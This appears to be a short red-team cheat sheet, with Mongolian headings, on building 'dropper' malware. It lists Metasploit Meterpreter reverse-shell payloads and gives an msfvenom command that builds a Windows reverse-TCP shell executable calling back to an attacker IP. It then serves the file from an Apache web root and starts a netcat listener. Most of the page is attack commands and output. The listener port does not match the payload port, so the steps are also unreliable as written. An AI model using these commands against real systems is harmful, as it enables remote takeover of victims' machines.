block-quote On this pagechevron-down
copy Copy chevron-down
🚩 Red Teamchevron-right ☠️ Exploit Development⚔️ PayloadsPayload-н төрлүүд болон firewall-д илрэхгүй хортой коднуудын талаар тайлбарлах болно
windows/x64/meterpreter_reverse_https
Connect back to attacker and spawn a Meterpreter shell
windows/x64/meterpreter/reverse_https
Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64)
Building Dropper Malwares
kali@kali:~$ sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.120 LPORT=444 -f exe -o /var/www/html/shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 324 bytes
kali@kali:~$ sudo service apache2 start
kali@kali:~$ sudo nc -lnvp 9001
listening on [any] 9001
-l --> incoming connection
-p --> specify the TCP port
C:\Users\Offsec\Downloads>